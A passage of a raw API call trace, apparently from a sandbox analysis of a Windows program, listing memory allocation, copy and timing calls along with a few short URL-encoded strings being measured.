[0100.043] malloc (_Size=0xa8) returned 0x24ae146ca90 [0100.043] malloc (_Size=0x80) returned 0x24ae146cb40 [0100.043] malloc (_Size=0x108) returned 0x24ae1459ad0 [0100.043] malloc (_Size=0x208) returned 0x24ae146f5c0 [0100.043] malloc (_Size=0xd8) returned 0x24ae145b980 [0100.043] malloc (_Size=0x30) returned 0x24ae13c9310 [0100.043] malloc (_Size=0xa8) returned 0x24ae146cbd0 [0100.043] malloc (_Size=0x80) returned 0x24ae146cc80 [0100.043] malloc (_Size=0x108) returned 0x24ae1474660 [0100.044] malloc (_Size=0x70) returned 0x24ae146cd10 [0100.045] malloc (_Size=0xa8) returned 0x24ae14751f0 [0100.045] malloc (_Size=0x80) returned 0x24ae14752a0 [0100.045] malloc (_Size=0x108) returned 0x24ae1473ab0 [0100.045] malloc (_Size=0x208) returned 0x24ae1475330 [0100.045] malloc (_Size=0x70) returned 0x24ae1470020 [0100.045] malloc (_Size=0xa8) returned 0x24ae14707e0 [0100.045] malloc (_Size=0x80) returned 0x24ae1470890 [0100.045] malloc (_Size=0x108) returned 0x24ae1473ef0 [0100.045] malloc (_Size=0x208) returned 0x24ae1475540 [0100.045] malloc (_Size=0x70) returned 0x24ae146fd20 [0100.046] memcpy (in: _Dst=0x24adf9b8378, _Src=0xd6788faf20, _Size=0x2 | out: _Dst=0x24adf9b8378) returned 0x24adf9b8378 [0100.046] malloc (_Size=0x28) returned 0x24ae146c320 [0100.046] memcpy (in: _Dst=0x24adf9a65fa, _Src=0x24ae1a0f684, _Size=0xc | out: _Dst=0x24adf9a65fa) returned 0x24adf9a65fa [0100.046] memcpy (in: _Dst=0x24adf9a65f8, _Src=0x24adf9b8378, _Size=0x2 | out: _Dst=0x24adf9a65f8) returned 0x24adf9a65f8 [0100.047] free (_Block=0x24ae146c320) [0100.047] malloc (_Size=0xb0) returned 0x24ae1475750 [0100.048] malloc (_Size=0x88) returned 0x24ae1470920 [0100.048] malloc (_Size=0x80) returned 0x24ae1475810 [0100.048] malloc (_Size=0xa8) returned 0x24ae14758a0 [0100.048] malloc (_Size=0x80) returned 0x24ae1475950 [0100.048] malloc (_Size=0x108) returned 0x24ae1474bb0 [0100.048] malloc (_Size=0xa8) returned 0x24ae147ea10 [0100.048] malloc (_Size=0xa8) returned 0x24ae147eac0 [0100.048] malloc (_Size=0x80) returned 0x24ae147eb70 [0100.048] malloc (_Size=0x108) returned 0x24ae1474ff0 [0100.049] malloc (_Size=0xa8) returned 0x24ae147ec00 [0100.051] malloc (_Size=0xa8) returned 0x24ae147ecb0 [0100.051] malloc (_Size=0xa8) returned 0x24ae147ed60 [0100.051] malloc (_Size=0x80) returned 0x24ae147ee10 [0100.051] malloc (_Size=0x108) returned 0x24ae1474770 [0100.051] GetTickCount () returned 0x210d028 [0100.052] malloc (_Size=0x28) returned 0x24ae146c320 [0100.052] malloc (_Size=0x28) returned 0x24ae147eea0 [0100.054] malloc (_Size=0x28) returned 0x24ae147eed0 [0100.054] memcpy (in: _Dst=0x24adf9a695e, _Src=0x24adf9b7cf8, _Size=0x2 | out: _Dst=0x24adf9a695e) returned 0x24adf9a695e [0100.054] memcpy (in: _Dst=0x24adf9a695c, _Src=0x24adf9b8298, _Size=0x2 | out: _Dst=0x24adf9a695c) returned 0x24adf9a695c [0100.054] memcpy (in: _Dst=0x24adf9a695a, _Src=0x24adf9b7dd8, _Size=0x2 | out: _Dst=0x24adf9a695a) returned 0x24adf9a695a [0100.054] memcpy (in: _Dst=0x24adf9a6958, _Src=0x24adf9b8018, _Size=0x2 | out: _Dst=0x24adf9a6958) returned 0x24adf9a6958 [0100.055] free (_Block=0x24ae147eed0) [0100.058] malloc (_Size=0xa8) returned 0x24ae147f080 [0100.059] malloc (_Size=0x208) returned 0x24ae147fee0 [0100.059] malloc (_Size=0xb0) returned 0x24ae14800f0 [0100.059] malloc (_Size=0x88) returned 0x24ae14801b0 [0100.059] malloc (_Size=0x80) returned 0x24ae1480240 [0100.060] malloc (_Size=0xa8) returned 0x24ae147fc30 [0100.060] malloc (_Size=0xa8) returned 0x24ae147f810 [0100.060] malloc (_Size=0x80) returned 0x24ae14802d0 [0100.060] malloc (_Size=0x108) returned 0x24ae1473de0 [0100.060] malloc (_Size=0xa8) returned 0x24ae147fa20 [0100.060] malloc (_Size=0x80) returned 0x24ae1480360 [0100.060] malloc (_Size=0x108) returned 0x24ae1474990 [0100.060] memcpy (in: _Dst=0x24adf9b7e98, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b7e98) returned 0x24adf9b7e98 [0100.060] malloc (_Size=0x28) returned 0x24ae14803f0 [0100.061] malloc (_Size=0xa8) returned 0x24ae147f6b0 [0100.061] malloc (_Size=0x208) returned 0x24ae1480420 [0100.061] memcpy (in: _Dst=0x24adf9a6b9c, _Src=0x24adf9b7e98, _Size=0x4 | out: _Dst=0x24adf9a6b9c) returned 0x24adf9a6b9c [0100.061] memcpy (in: _Dst=0x24adf9a6b98, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9a6b98) returned 0x24adf9a6b98 [0100.061] free (_Block=0x24ae14803f0) [0100.061] memcpy (in: _Dst=0x24adf9b7c18, _Src=0x24adf9a6b9c, _Size=0x4 | out: _Dst=0x24adf9b7c18) returned 0x24adf9b7c18 [0100.061] malloc (_Size=0x28) returned 0x24ae14803f0 [0100.062] memcpy (in: _Dst=0x24adf9b8118, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b8118) returned 0x24adf9b8118 [0100.062] malloc (_Size=0x28) returned 0x24ae1480630 [0100.062] memcpy (in: _Dst=0x24adf9a6bfc, _Src=0x24adf9b8118, _Size=0x4 | out: _Dst=0x24adf9a6bfc) returned 0x24adf9a6bfc [0100.062] memcpy (in: _Dst=0x24adf9a6bf8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9a6bf8) returned 0x24adf9a6bf8 [0100.063] free (_Block=0x24ae1480630) [0100.063] memcpy (in: _Dst=0x24adf9b8038, _Src=0x24adf9a6bfc, _Size=0x4 | out: _Dst=0x24adf9b8038) returned 0x24adf9b8038 [0100.063] malloc (_Size=0x28) returned 0x24ae1480630 [0100.063] malloc (_Size=0x28) returned 0x24ae1480660 [0100.063] memcpy (in: _Dst=0x24adf9b7c38, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b7c38) returned 0x24adf9b7c38 [0100.063] malloc (_Size=0x28) returned 0x24ae1480690 [0100.063] memcpy (in: _Dst=0x24adf9a662c, _Src=0x24adf9b7c38, _Size=0x4 | out: _Dst=0x24adf9a662c) returned 0x24adf9a662c [0100.063] memcpy (in: _Dst=0x24adf9a6628, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9a6628) returned 0x24adf9a6628 [0100.064] free (_Block=0x24ae1480690) [0100.064] memcpy (in: _Dst=0x24adf9b7f38, _Src=0x24adf9a662c, _Size=0x4 | out: _Dst=0x24adf9b7f38) returned 0x24adf9b7f38 [0100.064] malloc (_Size=0x28) returned 0x24ae1480690 [0100.064] malloc (_Size=0x28) returned 0x24ae14806c0 [0100.064] memcpy (in: _Dst=0x24adf9b82b8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b82b8) returned 0x24adf9b82b8 [0100.064] malloc (_Size=0x28) returned 0x24ae14806f0 [0100.065] memcpy (in: _Dst=0x24adf9a6c2c, _Src=0x24adf9b82b8, _Size=0x4 | out: _Dst=0x24adf9a6c2c) returned 0x24adf9a6c2c [0100.065] memcpy (in: _Dst=0x24adf9a6c28, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9a6c28) returned 0x24adf9a6c28 [0100.065] free (_Block=0x24ae14806f0) [0100.066] memcpy (in: _Dst=0x24adf9b7bf8, _Src=0x24adf9a6c2c, _Size=0x4 | out: _Dst=0x24adf9b7bf8) returned 0x24adf9b7bf8 [0100.066] malloc (_Size=0x28) returned 0x24ae14806f0 [0100.066] malloc (_Size=0x28) returned 0x24ae1480720 [0100.066] malloc (_Size=0xa8) returned 0x24ae147fce0 [0100.067] memcpy (in: _Dst=0x24adf9a5d3c, _Src=0x24adf9b7bf8, _Size=0x4 | out: _Dst=0x24adf9a5d3c) returned 0x24adf9a5d3c [0100.068] memcpy (in: _Dst=0x24adf9a5d3a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5d3a) returned 0x24adf9a5d3a [0100.068] memcpy (in: _Dst=0x24adf9a5d36, _Src=0x24adf9b7f38, _Size=0x4 | out: _Dst=0x24adf9a5d36) returned 0x24adf9a5d36 [0100.068] memcpy (in: _Dst=0x24adf9a5d34, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5d34) returned 0x24adf9a5d34 [0100.068] memcpy (in: _Dst=0x24adf9a5d30, _Src=0x24adf9b8038, _Size=0x4 | out: _Dst=0x24adf9a5d30) returned 0x24adf9a5d30 [0100.068] memcpy (in: _Dst=0x24adf9a5d2e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5d2e) returned 0x24adf9a5d2e [0100.068] memcpy (in: _Dst=0x24adf9a5d2a, _Src=0x24adf9b7c18, _Size=0x4 | out: _Dst=0x24adf9a5d2a) returned 0x24adf9a5d2a [0100.068] memcpy (in: _Dst=0x24adf9a5d28, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5d28) returned 0x24adf9a5d28 [0100.069] free (_Block=0x24ae1480720) [0100.069] SysStringLen (param_1="%41%67%47%41") returned 0xc [0100.070] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480720 [0100.070] memcpy (in: _Dst=0x24adf9b8468, _Src=0x24ae1480720, _Size=0x8 | out: _Dst=0x24adf9b8468) returned 0x24adf9b8468 [0100.070] free (_Block=0x24ae1480720) [0100.073] memcpy (in: _Dst=0x24ae1a7d128, _Src=0x24adfc6ee30, _Size=0x18 | out: _Dst=0x24ae1a7d128) returned 0x24ae1a7d128 [0100.073] GetTickCount () returned 0x210d038 [0100.074] memcpy (in: _Dst=0x24adf9b81d8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b81d8) returned 0x24adf9b81d8 [0100.074] malloc (_Size=0x28) returned 0x24ae1480720 [0100.074] memcpy (in: _Dst=0x24adf9b8a3e, _Src=0x24ae1a0f684, _Size=0xc | out: _Dst=0x24adf9b8a3e) returned 0x24adf9b8a3e [0100.074] memcpy (in: _Dst=0x24adf9b8a38, _Src=0x24adf9b81d8, _Size=0x6 | out: _Dst=0x24adf9b8a38) returned 0x24adf9b8a38 [0100.075] free (_Block=0x24ae1480720) [0100.079] malloc (_Size=0x28) returned 0x24ae1480720 [0100.080] malloc (_Size=0x28) returned 0x24ae1480750 [0100.084] malloc (_Size=0x28) returned 0x24ae1480780 [0100.084] GetTickCount () returned 0x210d048 [0100.084] memcpy (in: _Dst=0x24adf9b852e, _Src=0x24adf9b80d8, _Size=0x2 | out: _Dst=0x24adf9b852e) returned 0x24adf9b852e [0100.084] memcpy (in: _Dst=0x24adf9b852c, _Src=0x24adf9b8358, _Size=0x2 | out: _Dst=0x24adf9b852c) returned 0x24adf9b852c [0100.084] memcpy (in: _Dst=0x24adf9b852a, _Src=0x24adf9b82f8, _Size=0x2 | out: _Dst=0x24adf9b852a) returned 0x24adf9b852a [0100.084] memcpy (in: _Dst=0x24adf9b8528, _Src=0x24adf9b7d38, _Size=0x2 | out: _Dst=0x24adf9b8528) returned 0x24adf9b8528 [0100.085] free (_Block=0x24ae1480780) [0100.085] memcpy (in: _Dst=0x24adf9b8078, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8078) returned 0x24adf9b8078 [0100.085] malloc (_Size=0x28) returned 0x24ae14808f0 [0100.086] malloc (_Size=0x970) returned 0x24ae1480b90 [0100.086] memcpy (in: _Dst=0x24adf9b87fc, _Src=0x24adf9b8078, _Size=0x4 | out: _Dst=0x24adf9b87fc) returned 0x24adf9b87fc [0100.086] memcpy (in: _Dst=0x24adf9b87f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b87f8) returned 0x24adf9b87f8 [0100.087] free (_Block=0x24ae14808f0) [0100.087] memcpy (in: _Dst=0x24adf9b81f8, _Src=0x24adf9b87fc, _Size=0x4 | out: _Dst=0x24adf9b81f8) returned 0x24adf9b81f8 [0100.087] malloc (_Size=0x28) returned 0x24ae1480920 [0100.088] memcpy (in: _Dst=0x24adf9b7cb8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b7cb8) returned 0x24adf9b7cb8 [0100.088] malloc (_Size=0x28) returned 0x24ae1480a70 [0100.088] memcpy (in: _Dst=0x24adf9b891c, _Src=0x24adf9b7cb8, _Size=0x4 | out: _Dst=0x24adf9b891c) returned 0x24adf9b891c [0100.088] memcpy (in: _Dst=0x24adf9b8918, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8918) returned 0x24adf9b8918 [0100.089] free (_Block=0x24ae1480a70) [0100.089] memcpy (in: _Dst=0x24adf9b7db8, _Src=0x24adf9b891c, _Size=0x4 | out: _Dst=0x24adf9b7db8) returned 0x24adf9b7db8 [0100.089] malloc (_Size=0x28) returned 0x24ae1480ad0 [0100.089] malloc (_Size=0x28) returned 0x24ae14808f0 [0100.090] memcpy (in: _Dst=0x24adf9b7ef8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b7ef8) returned 0x24adf9b7ef8 [0100.090] malloc (_Size=0x28) returned 0x24ae14809b0 [0100.090] memcpy (in: _Dst=0x24adf9b882c, _Src=0x24adf9b7ef8, _Size=0x4 | out: _Dst=0x24adf9b882c) returned 0x24adf9b882c [0100.090] memcpy (in: _Dst=0x24adf9b8828, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8828) returned 0x24adf9b8828 [0100.091] free (_Block=0x24ae14809b0) [0100.091] memcpy (in: _Dst=0x24adf9b7e18, _Src=0x24adf9b882c, _Size=0x4 | out: _Dst=0x24adf9b7e18) returned 0x24adf9b7e18 [0100.091] malloc (_Size=0x28) returned 0x24ae1480860 [0100.091] malloc (_Size=0x28) returned 0x24ae1480b30 [0100.092] memcpy (in: _Dst=0x24adf9b7d18, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b7d18) returned 0x24adf9b7d18 [0100.092] malloc (_Size=0x28) returned 0x24ae1480830 [0100.092] memcpy (in: _Dst=0x24adf9b84cc, _Src=0x24adf9b7d18, _Size=0x4 | out: _Dst=0x24adf9b84cc) returned 0x24adf9b84cc [0100.092] memcpy (in: _Dst=0x24adf9b84c8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b84c8) returned 0x24adf9b84c8 [0100.093] free (_Block=0x24ae1480830) [0100.093] memcpy (in: _Dst=0x24adf9b8218, _Src=0x24adf9b84cc, _Size=0x4 | out: _Dst=0x24adf9b8218) returned 0x24adf9b8218 [0100.093] malloc (_Size=0x28) returned 0x24ae1480800 [0100.093] malloc (_Size=0x28) returned 0x24ae1480980 [0100.094] memcpy (in: _Dst=0x24adf9a5fbc, _Src=0x24adf9b8218, _Size=0x4 | out: _Dst=0x24adf9a5fbc) returned 0x24adf9a5fbc [0100.094] memcpy (in: _Dst=0x24adf9a5fba, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5fba) returned 0x24adf9a5fba [0100.094] memcpy (in: _Dst=0x24adf9a5fb6, _Src=0x24adf9b7e18, _Size=0x4 | out: _Dst=0x24adf9a5fb6) returned 0x24adf9a5fb6 [0100.094] memcpy (in: _Dst=0x24adf9a5fb4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5fb4) returned 0x24adf9a5fb4 [0100.094] memcpy (in: _Dst=0x24adf9a5fb0, _Src=0x24adf9b7db8, _Size=0x4 | out: _Dst=0x24adf9a5fb0) returned 0x24adf9a5fb0 [0100.094] memcpy (in: _Dst=0x24adf9a5fae, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5fae) returned 0x24adf9a5fae [0100.094] memcpy (in: _Dst=0x24adf9a5faa, _Src=0x24adf9b81f8, _Size=0x4 | out: _Dst=0x24adf9a5faa) returned 0x24adf9a5faa [0100.094] memcpy (in: _Dst=0x24adf9a5fa8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5fa8) returned 0x24adf9a5fa8 [0100.095] free (_Block=0x24ae1480980) [0100.095] SysStringLen (param_1="%74%41%41%49") returned 0xc [0100.095] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1481510 [0100.096] memcpy (in: _Dst=0x24adf9b86d8, _Src=0x24ae1481510, _Size=0x8 | out: _Dst=0x24adf9b86d8) returned 0x24adf9b86d8 [0100.096] free (_Block=0x24ae1481510) [0100.113] memcpy (in: _Dst=0x24ae1a7d128, _Src=0x24ae1a7ef70, _Size=0x18 | out: _Dst=0x24ae1a7d128) returned 0x24ae1a7d128 [0100.114] memcpy (in: _Dst=0x24ae1a7cf90, _Src=0x24ae145c720, _Size=0x18 | out: _Dst=0x24ae1a7cf90) returned 0x24ae1a7cf90 [0100.114] malloc (_Size=0x70) returned 0x24ae146fb20 [0100.114] malloc (_Size=0xa8) returned 0x24ae147f130 [0100.114] malloc (_Size=0x80) returned 0x24ae1481510 [0100.114] malloc (_Size=0x108) returned 0x24ae1473bc0 [0100.114] malloc (_Size=0x208) returned 0x24ae14815a0 [0100.114] malloc (_Size=0xd8) returned 0x24ae145a3a0 [0100.114] malloc (_Size=0x18) returned 0x24ae145c540 [0100.115] malloc (_Size=0x70) returned 0x24ae14704a0 [0100.115] malloc (_Size=0xa8) returned 0x24ae147fb80 [0100.115] malloc (_Size=0x80) returned 0x24ae14817b0 [0100.115] malloc (_Size=0x108) returned 0x24ae1473230 [0100.115] malloc (_Size=0x208) returned 0x24ae1481840 [0100.116] malloc (_Size=0x408) returned 0x24ae1481a50 [0100.116] malloc (_Size=0xd8) returned 0x24ae145a560 [0100.116] malloc (_Size=0x30) returned 0x24ae13c9190 [0100.116] malloc (_Size=0xd8) returned 0x24ae145b520 [0100.116] malloc (_Size=0x30) returned 0x24ae13c93d0 [0100.116] malloc (_Size=0xa8) returned 0x24ae147f760 [0100.116] malloc (_Size=0x80) returned 0x24ae1481e60 [0100.116] malloc (_Size=0x108) returned 0x24ae1473cd0 [0100.116] malloc (_Size=0x70) returned 0x24ae146fea0 [0100.116] malloc (_Size=0xa8) returned 0x24ae147f8c0 [0100.116] malloc (_Size=0x80) returned 0x24ae1481f40 [0100.117] malloc (_Size=0x108) returned 0x24ae1473560 [0100.117] malloc (_Size=0x208) returned 0x24ae1482f00 [0100.117] malloc (_Size=0x70) returned 0x24ae146fc20 [0100.117] malloc (_Size=0xa8) returned 0x24ae147fd90 [0100.117] malloc (_Size=0x80) returned 0x24ae1482720 [0100.117] malloc (_Size=0x108) returned 0x24ae1474aa0 [0100.117] malloc (_Size=0x208) returned 0x24ae1483110 [0100.117] malloc (_Size=0x70) returned 0x24ae14700a0 [0100.118] memcpy (in: _Dst=0x24adf9b7d98, _Src=0xd6788faf20, _Size=0x6 | out: _Dst=0x24adf9b7d98) returned 0x24adf9b7d98 [0100.118] malloc (_Size=0x28) returned 0x24ae14808c0 [0100.118] GetTickCount () returned 0x210d067 [0100.118] memcpy (in: _Dst=0x24adf9b84fe, _Src=0x24ae1a0f684, _Size=0xc | out: _Dst=0x24adf9b84fe) returned 0x24adf9b84fe [0100.118] memcpy (in: _Dst=0x24adf9b84f8, _Src=0x24adf9b7d98, _Size=0x6 | out: _Dst=0x24adf9b84f8) returned 0x24adf9b84f8 [0100.118] free (_Block=0x24ae14808c0) [0100.119] malloc (_Size=0x70) returned 0x24ae1470620 [0100.119] malloc (_Size=0x70) returned 0x24ae146f820 [0100.121] malloc (_Size=0x28) returned 0x24ae1480980 [0100.122] malloc (_Size=0x28) returned 0x24ae14808c0 [0100.123] malloc (_Size=0x28) returned 0x24ae14809e0 [0100.124] GetTickCount () returned 0x210d067 [0100.124] memcpy (in: _Dst=0x24adf9b8b8e, _Src=0x24adf9b7fb8, _Size=0x2 | out: _Dst=0x24adf9b8b8e) returned 0x24adf9b8b8e [0100.124] memcpy (in: _Dst=0x24adf9b8b8c, _Src=0x24adf9b7f78, _Size=0x2 | out: _Dst=0x24adf9b8b8c) returned 0x24adf9b8b8c [0100.124] memcpy (in: _Dst=0x24adf9b8b8a, _Src=0x24adf9b7f18, _Size=0x2 | out: _Dst=0x24adf9b8b8a) returned 0x24adf9b8b8a [0100.124] memcpy (in: _Dst=0x24adf9b8b88, _Src=0x24adf9b7cd8, _Size=0x2 | out: _Dst=0x24adf9b8b88) returned 0x24adf9b8b88 [0100.124] free (_Block=0x24ae14809e0) [0100.125] memcpy (in: _Dst=0x24adf9b8058, _Src=0xd6788f8e40, _Size=0x4 | out: _Dst=0x24adf9b8058) returned 0x24adf9b8058 [0100.125] malloc (_Size=0x28) returned 0x24ae1480830 [0100.125] memcpy (in: _Dst=0x24adf9b870c, _Src=0x24adf9b8058, _Size=0x4 | out: _Dst=0x24adf9b870c) returned 0x24adf9b870c [0100.125] memcpy (in: _Dst=0x24adf9b8708, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8708) returned 0x24adf9b8708 [0100.126] free (_Block=0x24ae1480830) [0100.126] memcpy (in: _Dst=0x24adf9b7ff8, _Src=0x24adf9b870c, _Size=0x4 | out: _Dst=0x24adf9b7ff8) returned 0x24adf9b7ff8 [0100.126] malloc (_Size=0x28) returned 0x24ae14809e0 [0100.126] memcpy (in: _Dst=0x24adf9b8098, _Src=0xd6788f8e40, _Size=0x4 | out: _Dst=0x24adf9b8098) returned 0x24adf9b8098 [0100.126] malloc (_Size=0x28) returned 0x24ae1480890 [0100.127] memcpy (in: _Dst=0x24adf9b897c, _Src=0x24adf9b8098, _Size=0x4 | out: _Dst=0x24adf9b897c) returned 0x24adf9b897c [0100.127] memcpy (in: _Dst=0x24adf9b8978, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8978) returned 0x24adf9b8978 [0100.127] free (_Block=0x24ae1480890) [0100.127] memcpy (in: _Dst=0x24adf9b80f8, _Src=0x24adf9b897c, _Size=0x4 | out: _Dst=0x24adf9b80f8) returned 0x24adf9b80f8 [0100.128] malloc (_Size=0x28) returned 0x24ae1480950 [0100.128] malloc (_Size=0x28) returned 0x24ae1480830 [0100.128] memcpy (in: _Dst=0x24adf9b82d8, _Src=0xd6788f8e40, _Size=0x4 | out: _Dst=0x24adf9b82d8) returned 0x24adf9b82d8 [0100.128] malloc (_Size=0x28) returned 0x24ae1480a70 [0100.128] memcpy (in: _Dst=0x24adf9b88ec, _Src=0x24adf9b82d8, _Size=0x4 | out: _Dst=0x24adf9b88ec) returned 0x24adf9b88ec [0100.128] memcpy (in: _Dst=0x24adf9b88e8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b88e8) returned 0x24adf9b88e8 [0100.129] free (_Block=0x24ae1480a70) [0100.129] memcpy (in: _Dst=0x24adf9b8258, _Src=0x24adf9b88ec, _Size=0x4 | out: _Dst=0x24adf9b8258) returned 0x24adf9b8258 [0100.129] malloc (_Size=0x28) returned 0x24ae1480890 [0100.129] malloc (_Size=0x28) returned 0x24ae14809b0 [0100.129] memcpy (in: _Dst=0x24adf9b8158, _Src=0xd6788f8e40, _Size=0x4 | out: _Dst=0x24adf9b8158) returned 0x24adf9b8158 [0100.130] malloc (_Size=0x28) returned 0x24ae1480a10 [0100.130] memcpy (in: _Dst=0x24adf9b89ac, _Src=0x24adf9b8158, _Size=0x4 | out: _Dst=0x24adf9b89ac) returned 0x24adf9b89ac [0100.130] memcpy (in: _Dst=0x24adf9b89a8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b89a8) returned 0x24adf9b89a8 [0100.131] free (_Block=0x24ae1480a10) [0100.131] memcpy (in: _Dst=0x24adf9b8338, _Src=0x24adf9b89ac, _Size=0x4 | out: _Dst=0x24adf9b8338) returned 0x24adf9b8338 [0100.131] malloc (_Size=0x28) returned 0x24ae1480a40 [0100.131] malloc (_Size=0x28) returned 0x24ae1480a10 [0100.131] memcpy (in: _Dst=0x24adf9a55fc, _Src=0x24adf9b8338, _Size=0x4 | out: _Dst=0x24adf9a55fc) returned 0x24adf9a55fc [0100.131] memcpy (in: _Dst=0x24adf9a55fa, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55fa) returned 0x24adf9a55fa [0100.131] memcpy (in: _Dst=0x24adf9a55f6, _Src=0x24adf9b8258, _Size=0x4 | out: _Dst=0x24adf9a55f6) returned 0x24adf9a55f6 [0100.132] memcpy (in: _Dst=0x24adf9a55f4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55f4) returned 0x24adf9a55f4 [0100.132] memcpy (in: _Dst=0x24adf9a55f0, _Src=0x24adf9b80f8, _Size=0x4 | out: _Dst=0x24adf9a55f0) returned 0x24adf9a55f0 [0100.132] memcpy (in: _Dst=0x24adf9a55ee, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55ee) returned 0x24adf9a55ee [0100.132] memcpy (in: _Dst=0x24adf9a55ea, _Src=0x24adf9b7ff8, _Size=0x4 | out: _Dst=0x24adf9a55ea) returned 0x24adf9a55ea [0100.132] memcpy (in: _Dst=0x24adf9a55e8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55e8) returned 0x24adf9a55e8 [0100.132] free (_Block=0x24ae1480a10) [0100.132] SysStringLen (param_1="%76%69%50%55") returned 0xc [0100.133] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1483320 [0100.133] memcpy (in: _Dst=0x24adf9b8738, _Src=0x24ae1483320, _Size=0x8 | out: _Dst=0x24adf9b8738) returned 0x24adf9b8738 [0100.133] free (_Block=0x24ae1483320) [0100.133] malloc (_Size=0x2e0) returned 0x24ae1483320 [0100.134] GetTickCount () returned 0x210d077 [0100.134] malloc (_Size=0x20) returned 0x24ae1480a10 [0100.134] malloc (_Size=0x288) returned 0x24ae1483610 [0100.134] realloc (_Block=0x0, _Size=0x140) returned 0x24ae14838a0 [0100.134] GetTickCount () returned 0x210d077 [0100.134] realloc (_Block=0x24ae1480a10, _Size=0x40) returned 0x24ae14839f0 [0100.134] realloc (_Block=0x24ae14838a0, _Size=0x280) returned 0x24ae1483a40 [0100.134] malloc (_Size=0x508) returned 0x24ae1483cd0 [0100.134] GetTickCount () returned 0x210d077 [0100.134] realloc (_Block=0x24ae14839f0, _Size=0x80) returned 0x24ae14838a0 [0100.135] GetTickCount () returned 0x210d077 [0100.135] realloc (_Block=0x24ae1483a40, _Size=0x500) returned 0x24ae14841e0 [0100.135] GetTickCount () returned 0x210d077 [0100.135] malloc (_Size=0xa08) returned 0x24ae14846f0 [0100.135] GetTickCount () returned 0x210d077 [0100.135] realloc (_Block=0x24ae14838a0, _Size=0x100) returned 0x24ae14838a0 [0100.135] GetTickCount () returned 0x210d077 [0100.135] GetTickCount () returned 0x210d077 [0100.135] realloc (_Block=0x24ae14841e0, _Size=0xa00) returned 0x24ae1485100 [0100.135] GetTickCount () returned 0x210d077 [0100.135] GetTickCount () returned 0x210d077 [0100.136] GetTickCount () returned 0x210d077 [0100.136] malloc (_Size=0x1408) returned 0x24ae1485b10 [0100.136] GetTickCount () returned 0x210d077 [0100.136] realloc (_Block=0x24ae14838a0, _Size=0x200) returned 0x24ae14838a0 [0100.136] GetTickCount () returned 0x210d077 [0100.136] GetTickCount () returned 0x210d077 [0100.136] GetTickCount () returned 0x210d077 [0100.136] realloc (_Block=0x24ae1485100, _Size=0x1400) returned 0x24ae1486f20 [0100.137] GetTickCount () returned 0x210d077 [0100.137] GetTickCount () returned 0x210d077 [0100.137] GetTickCount () returned 0x210d077 [0100.137] GetTickCount () returned 0x210d077 [0100.137] GetTickCount () returned 0x210d077 [0100.137] GetTickCount () returned 0x210d077 [0100.137] GetTickCount () returned 0x210d077 [0100.137] GetTickCount () returned 0x210d077 [0100.137] malloc (_Size=0x2808) returned 0x24ae1488330 [0100.138] GetTickCount () returned 0x210d077 [0100.139] GetTickCount () returned 0x210d077 [0100.143] GetTickCount () returned 0x210d077 [0100.145] GetTickCount () returned 0x210d086 [0100.147] GetTickCount () returned 0x210d086 [0100.149] GetTickCount () returned 0x210d086 [0100.150] GetTickCount () returned 0x210d086 [0100.152] GetTickCount () returned 0x210d086 [0100.153] GetTickCount () returned 0x210d086 [0100.155] GetTickCount () returned 0x210d086 [0100.157] GetTickCount () returned 0x210d086 [0100.160] GetTickCount () returned 0x210d096 [0100.163] GetTickCount () returned 0x210d096 [0100.165] GetTickCount () returned 0x210d096 [0100.167] GetTickCount () returned 0x210d096 [0100.169] GetTickCount () returned 0x210d096 [0100.170] GetTickCount () returned 0x210d096 [0100.170] malloc (_Size=0x28) returned 0x24ae1480a10 [0100.170] malloc (_Size=0x28) returned 0x24ae1480a70 [0100.170] malloc (_Size=0x28) returned 0x24ae14807d0 [0100.171] memcpy (in: _Dst=0x24adf9b85ee, _Src=0x24adf9b8318, _Size=0x2 | out: _Dst=0x24adf9b85ee) returned 0x24adf9b85ee [0100.171] memcpy (in: _Dst=0x24adf9b85ec, _Src=0x24adf9b81b8, _Size=0x2 | out: _Dst=0x24adf9b85ec) returned 0x24adf9b85ec [0100.171] memcpy (in: _Dst=0x24adf9b85ea, _Src=0x24adf9b8198, _Size=0x2 | out: _Dst=0x24adf9b85ea) returned 0x24adf9b85ea [0100.171] memcpy (in: 